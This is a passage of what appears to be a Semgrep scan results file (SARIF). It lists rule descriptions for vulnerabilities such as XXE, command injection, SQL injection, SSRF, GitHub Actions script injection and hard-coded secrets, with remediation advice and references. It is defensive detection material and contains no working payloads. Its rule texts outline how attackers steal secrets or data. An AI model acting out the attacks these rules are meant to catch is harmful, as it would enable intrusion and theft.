Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.xml-external-entities-unsafe-entity-loader.xml-external-entities-unsafe-entity-loader"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch."},"help":{"markdown":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/docdb_cluster#enabled_cloudwatch_logs_exports](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/docdb_cluster#enabled_cloudwatch_logs_exports)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/)\n","text":"Auditing is not enabled for DocumentDB. To ensure that you are able to accurately audit the usage of your DocumentDB cluster, you should enable auditing and export logs to CloudWatch."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","id":"terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","name":"terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled","properties":{"precision":"very-high","tags":["CWE-778: Insufficient Logging","MEDIUM CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-documentdb-auditing-disabled.aws-documentdb-auditing-disabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\"."},"help":{"markdown":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.github-actions.security.github-script-injection.github-script-injection)\n - [https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections](https://docs.github.com/en/actions/learn-github-actions/security-hardening-for-github-actions#understanding-the-risk-of-script-injections)\n - [https://securitylab.github.com/research/github-actions-untrusted-input/](https://securitylab.github.com/research/github-actions-untrusted-input/)\n - [https://github.com/actions/github-script](https://github.com/actions/github-script)\n","text":"Using variable interpolation `${{...}}` with `github` context data in a `actions/github-script`'s `script:` step could allow an attacker to inject their own code into the runner. This would allow them to steal secrets and code. `github` context data can have arbitrary user input and should be treated as untrusted. Instead, use an intermediate environment variable with `env:` to store the data and use the environment variable in the `run:` script. Be sure to use double-quotes the environment variable, like this: \"$ENVVAR\"."},"helpUri":"https://semgrep.dev/r/yaml.github-actions.security.github-script-injection.github-script-injection","id":"yaml.github-actions.security.github-script-injection.github-script-injection","name":"yaml.github-actions.security.github-script-injection.github-script-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.github-actions.security.github-script-injection.github-script-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","id":"java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","name":"java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.mongo.java-mongo-hardcoded-secret.java-mongo-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability."},"help":{"markdown":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.formatted-template-string.formatted-template-string)\n - [https://golang.org/pkg/html/template/#HTML](https://golang.org/pkg/html/template/#HTML)\n","text":"Found a formatted template string passed to 'template.HTML()'. 'template.HTML()' does not escape contents. Be absolutely sure there is no user-controlled data in this template. If user data can reach this template, you may have a XSS vulnerability."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.formatted-template-string.formatted-template-string","id":"go.lang.security.audit.net.formatted-template-string.formatted-template-string","name":"go.lang.security.audit.net.formatted-template-string.formatted-template-string","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.formatted-template-string.formatted-template-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","id":"python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","name":"python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.os.tainted-os-command-stdlib-secure-if-array.tainted-os-command-stdlib-secure-if-array"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks through parameter entities by configuring $FACTORY with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","id":"java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","name":"java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.xmlreader-xxe-parameter-entities.xmlreader-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead."},"help":{"markdown":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea)\n - [https://tools.ietf.org/html/rfc5469](https://tools.ietf.org/html/rfc5469)\n - [https://cryptography.io/en/latest/hazmat/primitives/symmetric-encryption/#cryptography.hazmat.primitives.ciphers.algorithms.IDEA](https://cryptography.io/en/latest/hazmat/primitives/symmetric-encryption/#cryptography.hazmat.primitives.ciphers.algorithms.IDEA)\n","text":"IDEA (International Data Encryption Algorithm) is a block cipher created in 1991. It is an optional component of the OpenPGP standard. This cipher is susceptible to attacks when using weak keys. It is recommended that you do not use this cipher for new applications. Use a strong symmetric cipher such as EAS instead. With the `cryptography` package it is recommended to use `Fernet` which is a secure implementation of AES in CBC mode with a 128-bit key. Alternatively, keep using the `Cipher` class from the hazmat primitives but use the AES algorithm instead."},"helpUri":"https://semgrep.dev/r/python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","id":"python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","name":"python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.security.insecure-cipher-algorithms.insecure-cipher-algorithm-idea"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","id":"python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","name":"python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-httponly-missing.flask-cookie-httponly-missing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"AWS Session Token detected"},"help":{"markdown":"AWS Session Token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-aws-session-token.detected-aws-session-token)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"AWS Session Token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-aws-session-token.detected-aws-session-token","id":"generic.secrets.security.detected-aws-session-token.detected-aws-session-token","name":"generic.secrets.security.detected-aws-session-token.detected-aws-session-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-aws-session-token.detected-aws-session-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption."},"help":{"markdown":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete)\n - [https://wiki.sei.cmu.edu/confluence/display/c/MEM30-C.+Do+not+access+freed+memory](https://wiki.sei.cmu.edu/confluence/display/c/MEM30-C.+Do+not+access+freed+memory)\n - [https://wiki.sei.cmu.edu/confluence/display/cplusplus/EXP54-CPP.+Do+not+access+an+object+outside+of+its+lifetime](https://wiki.sei.cmu.edu/confluence/display/cplusplus/EXP54-CPP.+Do+not+access+an+object+outside+of+its+lifetime)\n","text":"This expression points to memory that has been freed. This can lead to a segmentation fault or memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","id":"cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","name":"cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete","properties":{"precision":"very-high","tags":["CWE-416: Use After Free","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.use-after-free.local-variable-new-delete.local-variable-new-delete"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.mysql.mysql-empty-password.mysql-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.mysql.mysql-empty-password.mysql-empty-password","id":"go.secrets.mysql.mysql-empty-password.mysql-empty-password","name":"go.secrets.mysql.mysql-empty-password.mysql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.mysql.mysql-empty-password.mysql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site."},"help":{"markdown":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.open-redirect-pathname.open-redirect-pathname)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)\n","text":"The application builds a URL using user-controlled input which can lead to an open redirect vulnerability. An attacker can manipulate the URL and redirect users to an arbitrary domain. Open redirect vulnerabilities can lead to issues such as Cross-site scripting (XSS) or redirecting to a malicious domain for activities such as phishing to capture users' credentials. To prevent this vulnerability perform strict input validation of the domain against an allowlist of approved domains. Notify a user in your application that they are leaving the website. Display a domain where they are redirected to the user. A user can then either accept or deny the redirect to an untrusted site."},"helpUri":"https://semgrep.dev/r/javascript.browser.open-redirect-pathname.open-redirect-pathname","id":"javascript.browser.open-redirect-pathname.open-redirect-pathname","name":"javascript.browser.open-redirect-pathname.open-redirect-pathname","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.open-redirect-pathname.open-redirect-pathname"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."},"help":{"markdown":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy)\n - [https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy](https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/configuring-openid-connect-in-amazon-web-services#configuring-the-role-and-trust-policy)\n - [https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/](https://dagrz.com/writing/aws-security/hacking-github-aws-oidc/)\n","text":"`$POLICY` is missing a `condition` block which scopes users of this policy to specific GitHub repositories. Without this, `$POLICY` is open to all users on GitHub. Add a `condition` block on the variable `token.actions.githubusercontent.com:sub` which scopes it to prevent this."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","id":"terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","name":"terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.unrestricted-github-oidc-policy.unrestricted-github-oidc-policy"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.aws-lambda.security.tainted-sql-string.tainted-sql-string)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"helpUri":"https://semgrep.dev/r/java.aws-lambda.security.tainted-sql-string.tainted-sql-string","id":"java.aws-lambda.security.tainted-sql-string.tainted-sql-string","name":"java.aws-lambda.security.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.aws-lambda.security.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n - [https://dispatchhttp.org/Dispatch.html](https://dispatchhttp.org/Dispatch.html)\n","text":"A parameter being passed directly into `url` most likely lead to SSRF. This could allow an attacker to send data to their own server, potentially exposing sensitive data sent with this request. They could also probe internal servers or other resources that the server running this code can access. Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","id":"scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","name":"scala.lang.security.audit.dispatch-ssrf.dispatch-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: 